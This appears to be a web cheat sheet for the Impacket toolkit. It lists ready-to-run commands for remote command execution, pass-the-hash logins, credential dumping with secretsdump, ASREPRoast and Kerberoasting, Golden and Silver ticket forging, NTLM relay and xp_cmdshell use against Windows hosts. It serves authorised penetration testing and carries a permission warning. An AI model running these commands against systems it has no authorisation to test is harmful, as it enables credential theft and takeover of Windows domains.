コンテンツにスキップ

Impacket Toolkit Cheat Sheet

Overview

Impacket is a collection of Python classes for working with network protocols. It provides low-level programmatic access to packets and implements several protocols including SMB, MSRPC, and Kerberos. Impacket includes numerous ready-to-use tools for penetration testing, particularly focused on Windows environments.

⚠️ Warning: Impacket is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation

From PyPI

pip install impacket

From GitHub

git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

On Kali Linux

sudo apt update
sudo apt install -y python3-impacket

Using Virtual Environment

# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate  # Linux/macOS
impacket-env\Scripts\activate.bat  # Windows

# Install Impacket
pip install impacket

Command Execution Tools

psexec.py

Executes commands on remote Windows systems using the SMB protocol, similar to SysInternals' PsExec.

Basic Usage

psexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-k Use Kerberos authentication
-no-pass Don't ask for password (useful for Kerberos)
-port [port] Connect to SMB Server port (default: 445)
-debug Turn DEBUG output ON

Examples

# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe

# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe

# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe

smbexec.py

Similar to psexec.py but uses different techniques to execute commands, making it potentially stealthier.

Basic Usage

smbexec.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-share SHARE Share where the output will be grabbed from (default: ADMIN$)
-shell-type \\{cmd,powershell\\} Shell type to use (default: cmd)
-codec CODEC Sets encoding used (codec) from the target's output (default: UTF-8)
-service-name NAME Service name to use (default: random)

Examples

# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100

wmiexec.py

Executes commands on remote Windows systems using WMI.

Basic Usage

wmiexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-share SHARE Share where the output will be grabbed from (default: ADMIN$)
-silentcommand Execute command and return immediately without output
-codec CODEC Sets encoding used (codec) from the target's output (default: UTF-8)
-shell-type \\{cmd,powershell\\} Shell type to use (default: cmd)

Examples

# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

dcomexec.py

Executes commands on remote Windows systems using DCOM objects.

Basic Usage

dcomexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-object \\{ShellWindows,ShellBrowserWindow,MMC20\\} DCOM object to use (default: MMC20.Application)
-silentcommand Execute command and return immediately without output
-codec CODEC Sets encoding used (codec) from the target's output (default: UTF-8)
-shell-type \\{cmd,powershell\\} Shell type to use (default: cmd)

Examples

# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

atexec.py

Executes commands on remote Windows systems using the Task Scheduler service.

Basic Usage

atexec.py [domain/]username[:password]@target [options] command

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-silentcommand Execute command and return immediately without output
-codec CODEC Sets encoding used (codec) from the target's output (default: UTF-8)

Examples

# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

Credential Dumping Tools

secretsdump.py

Extracts credentials from a remote Windows system, including SAM, LSA Secrets, and NTDS.dit.

Basic Usage

secretsdump.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-just-dc Extract only NTDS.DIT data (domain controller only)
-just-dc-ntlm Extract only NTDS.DIT NTLM hashes (domain controller only)
-just-dc-user USER Extract only NTDS.DIT data for specific user
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account
-user-status Shows whether the user is enabled or disabled
-history Dump password history
-outputfile FILE Write output to file

Examples

# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100

# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100

Kerberos Attack Tools

GetNPUsers.py

Retrieves password hashes for users with "Do not require Kerberos preauthentication" set (ASREPRoast attack).

Basic Usage

GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Common Options

Option Description
-request Requests TGT for users and output them in JtR/hashcat format
-no-pass Don't ask for password (useful for Kerberos)
-k Use Kerberos authentication
-dc-ip IP IP Address of the domain controller
-usersfile FILE File with user per line to test
-format \\{hashcat,john\\} Format to save the AS_REP responses (default: hashcat)
-outputfile FILE Output filename to write ciphers in JtR/hashcat format

Examples

# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request

# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1

# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat

# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass

GetUserSPNs.py

Retrieves Service Principal Names (SPNs) for accounts in the domain (Kerberoasting attack).

Basic Usage

GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Common Options

Option Description
-request Requests TGS for users and output them in JtR/hashcat format
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-dc-ip IP IP Address of the domain controller
-target-user USER Target specific user to request TGS for
-outputfile FILE Output filename to write ciphers in JtR/hashcat format
-format \\{hashcat,john\\} Format to save the TGS tickets (default: hashcat)

Examples

# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice

# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat

# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request

ticketer.py

Creates Golden and Silver Tickets for Kerberos authentication.

Basic Usage

ticketer.py [options] username

Common Options

Option Description
-nthash HASH NT hash for the user or service account
-aesKey KEY AES key for the user or service account
-domain DOMAIN Domain name
-domain-sid SID Domain SID
-spn SPN Service Principal Name (for Silver Tickets)
-groups IDS Comma-separated list of group IDs to include in the ticket
-duration HOURS Ticket duration in hours (default: 10)
-out FILE Output filename to save the ticket

Examples

# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator

Network Protocols Tools

smbclient.py

Provides an SMB client to access shares and files on remote systems.

Basic Usage

smbclient.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-port [port] Connect to SMB Server port (default: 445)
-file FILE Input file with commands to execute in the mini shell
-debug Turn DEBUG output ON

Common Commands (Interactive Shell)

Command Description
help Show available commands
shares List available shares
use <share> Connect to a specific share
ls List files in current directory
cd <dir> Change directory
get <file> Download file
put <file> Upload file
rm <file> Delete file
mkdir <dir> Create directory
rmdir <dir> Remove directory
exit Exit the shell

Examples

# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

mssqlclient.py

Provides a client to interact with Microsoft SQL Server instances.

Basic Usage

mssqlclient.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-windows-auth Use Windows Authentication (default: False)
-port [port] Destination port to connect to (default: 1433)
-db DATABASE MSSQL database instance (default: None)
-file FILE Input file with commands to execute in the SQL shell
-debug Turn DEBUG output ON

Common Commands (Interactive Shell)

Command Description
help Show available commands
enable_xp_cmdshell Enable the xp_cmdshell stored procedure
disable_xp_cmdshell Disable the xp_cmdshell stored procedure
xp_cmdshell <command> Execute command through xp_cmdshell
sp_start_job <job> Start a SQL Server job
exit Exit the shell

Examples

# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100

# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100

# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth

Other Useful Tools

ntlmrelayx.py

Performs NTLM Relay attacks.

Basic Usage

ntlmrelayx.py [options]

Common Options

Option Description
-t TARGET Target to relay the credentials to
-tf FILE File with targets to relay the credentials to
-w Start the HTTP server and do not relay credentials
-e FILE Execute this file when a connection is relayed
-c COMMAND Execute this command when a connection is relayed
-smb2support Enable SMB2 support
-socks Launch a SOCKS proxy for the connection
-one-shot Relay only one connection
-debug Turn DEBUG output ON

Examples

# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support

# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\\temp\\whoami.txt"

# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d

# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks

lookupsid.py

Performs SID lookups to enumerate users and groups.

Basic Usage

lookupsid.py [domain/]username[:password]@target [options]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-domain DOMAIN Domain to enumerate (default: target domain)
-debug Turn DEBUG output ON

Examples

# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100

# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

reg.py

Provides a remote registry manipulation tool.

Basic Usage

reg.py [domain/]username[:password]@target [options] action [params]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-debug Turn DEBUG output ON

Actions

Action Description
query Query a registry key or value
add Add a registry key or value
delete Delete a registry key or value
save Save a registry hive to a file

Examples

# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\\SOFTWARE\\Test -v TestValue -vt REG_SZ -vd "Test Data"

# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\\SOFTWARE\\Test

Common Parameters Across Tools

Parameter Description
-h, --help Show help message and exit
-debug Turn DEBUG output ON
-hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH
-no-pass Don't ask for password (useful for Kerberos)
-k Use Kerberos authentication
-aesKey KEY AES key to use for Kerberos authentication
-dc-ip IP IP Address of the domain controller
-target-ip IP IP Address of the target machine
-port [port] Destination port to connect to

Resources